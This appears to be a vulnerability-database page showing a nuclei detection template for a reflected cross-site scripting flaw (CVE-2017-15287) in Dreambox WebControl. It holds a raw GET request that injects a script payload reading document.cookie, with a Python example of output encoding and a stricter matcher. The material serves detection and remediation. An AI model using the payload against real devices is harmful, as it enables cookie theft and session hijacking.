Dreambox WebControl 2.0.0 - Cross-Site Scripting

ID: NUCLEI:CVE-2017-15287
Type: nuclei
Reporter: ProjectDiscovery
Published: 2022-01-15 20:35:33 (history entry: Jan 15, 2022 - 8:35 p.m.)
Source: github.com
Tags: dreambox, webcontrol, vulnerability, xss, bouqueteditor, cve2017

CVSS2: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
  Attack Vector: NETWORK
  Attack Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE

CVSS3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: CHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: NONE

AI Score: 6.2 (Confidence: High)

EPSS: 0.001 (Percentile: 47.9%)

Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
id: CVE-2017-15287

info:
  name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
  reference:
    - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
    - https://www.exploit-db.com/exploits/42986/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15287
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-15287
    cwe-id: CWE-79
    epss-score: 0.00129
    epss-percentile: 0.47671
    cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
  metadata:
    max-request: 1
    vendor: bouqueteditor_project
    product: bouqueteditor
    framework: dreambox
  tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project

http:
  - raw:
      - |
        GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: word
        words:
          - 'Unknown command: <script>alert(document.cookie)</script>'
# digest: 4b0a00483046022100c0006e2859428861ac83e645dd91632ebad9b3a16a76fa2d38689f71ed1b7bea022100f1be24e96e715c1448270af7e94365b6ecda3ffb6dec61ccc86a133b922c0da8:922c64590222798bb761d5b6d8e72950
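
The following is an added example, not part of the template or of ProjectDiscovery's code. It shows output encoding at the HTML sink as the fix for the "Unknown command:" reflection, next to a stricter form of the template's word matcher that also looks at the Content-Type. The function names are hypothetical and the device's real handler is not shown on this page, so both render functions are assumptions about its shape.

```python
import html

# Payload and marker string copied from the template above.
PAYLOAD = "<script>alert(document.cookie)</script>"
MARKER = "Unknown command: "

# Content types a browser parses as markup (assumption: a missing
# Content-Type is treated as renderable because browsers may sniff it).
RENDERABLE = {"", "text/html", "application/xhtml+xml"}


def render_vulnerable(command: str) -> str:
    """Hypothetical handler: echoes the parameter into HTML unencoded."""
    return f"<html><body>{MARKER}{command}</body></html>"


def render_fixed(command: str) -> str:
    """Same handler with HTML entity encoding applied to the echoed value."""
    return f"<html><body>{MARKER}{html.escape(command, quote=True)}</body></html>"


def reflects_unencoded(headers: dict, body: str, payload: str = PAYLOAD) -> bool:
    """Report a finding only when the raw payload follows the marker AND
    the response is one a browser would render as HTML. The same string
    echoed as text/plain or JSON does not execute and is not reported."""
    ctype = ""
    for name, value in headers.items():
        if name.lower() == "content-type":
            ctype = value.split(";", 1)[0].strip().lower()
    if ctype not in RENDERABLE:
        return False
    return (MARKER + payload) in body


def demo() -> dict:
    """Run the matcher over three constructed responses."""
    html_hdr = {"Content-Type": "text/html; charset=utf-8"}
    text_hdr = {"content-type": "text/plain"}
    return {
        "vulnerable_html": reflects_unencoded(html_hdr, render_vulnerable(PAYLOAD)),
        "fixed_html": reflects_unencoded(html_hdr, render_fixed(PAYLOAD)),
        "vulnerable_body_as_text": reflects_unencoded(text_hdr, render_vulnerable(PAYLOAD)),
    }


if __name__ == "__main__":
    for case, finding in demo().items():
        print(f"{case}: {finding}")
```

The template's matcher inspects only the body, so the Content-Type check here is a tightening of it, not a description of how nuclei evaluates this template.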
